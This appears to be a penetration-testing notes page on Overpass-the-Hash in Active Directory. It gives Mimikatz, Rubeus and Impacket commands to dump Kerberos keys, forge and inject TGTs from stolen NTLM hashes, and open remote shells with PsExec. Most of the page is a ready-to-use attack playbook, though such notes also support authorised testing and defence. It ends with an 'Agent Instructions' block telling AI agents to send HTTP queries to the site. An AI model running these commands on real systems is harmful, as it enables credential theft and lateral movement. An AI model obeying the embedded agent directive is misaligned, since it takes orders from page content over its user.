# Overpass the Hash

Only with **NTLMv1**.

Turn a Kerberos Key (these include the NTLM hash, RC4) of a domain user into a Kerberos Ticket (TGT), and use it for authentication. Valid only for the machine for which it was created.

{% tabs %}
{% tab title="Windows" %}

## [Mimikatz](https://github.com/gentilkiwi/mimikatz)

* Requires Administrator Privileges

View Kerberos Keys

{% code overflow="wrap" %}

```powershell
.\mimikatz.exe    
> privilege::debug
> sekurlsa::ekeys
```

{% endcode %}

New CMD with victim user.

{% code overflow="wrap" %}

```powershell
> sekurlsa::pth /domain:<DOMAIN> /user:<USER> /ntlm:<KEY/NTLM> [/run:Powershell.exe]
```

{% endcode %}

There is also `/rc4`,`/aes128` or `/aes256`&#x20;

After that, in the new terminal with the victim's ticket you can

```powershell
net use //<ComputerName>
PsExec.exe \\<ComputerName> cmd.exe -accepteula
```

## [Rubeus](https://github.com/GhostPack/Rubeus)

* **NOT** Requires Administrator Privileges

Create new TGT for given user, view it and then upload it *(like it was a cookie)*.

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /nowrap 
# printed in base64
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe ptt /ticket:<BASE64_TICKET>
```

{% endcode %}

Or create new TGT for given user and upload it immediately without displaying it.

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /ptt
```

{% endcode %}

Also possible to use: `/aes128`, `/aes256`, `/des`
{% endtab %}

{% tab title="Linux" %}
With [getTGT](https://github.com/fortra/impacket/blob/master/examples/getTGT.py) get the `TGT`

{% code overflow="wrap" %}

```bash
getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>' -hashes :<NTLM_HASH>
```

{% endcode %}

Import it

{% code overflow="wrap" %}

```bash
chmod 600 <USER>.ccache
export KRB5CCNAME=<USER>.ccache
klist
```

{% endcode %}

Use with Kerberos authentication (`-k`)

```bash
nxc smb <IP_TARGET> --use-kcache --kdcHost <HOSTNAME_DC>
psexec.py -k -no-pass -dc-ip <DC_IP> <HOSTNAME_TARGET>
# also with impacket-secretsdump, impacket-wmiexec, etc.
```

{% endtab %}
{% endtabs %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/overpass-the-hash.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.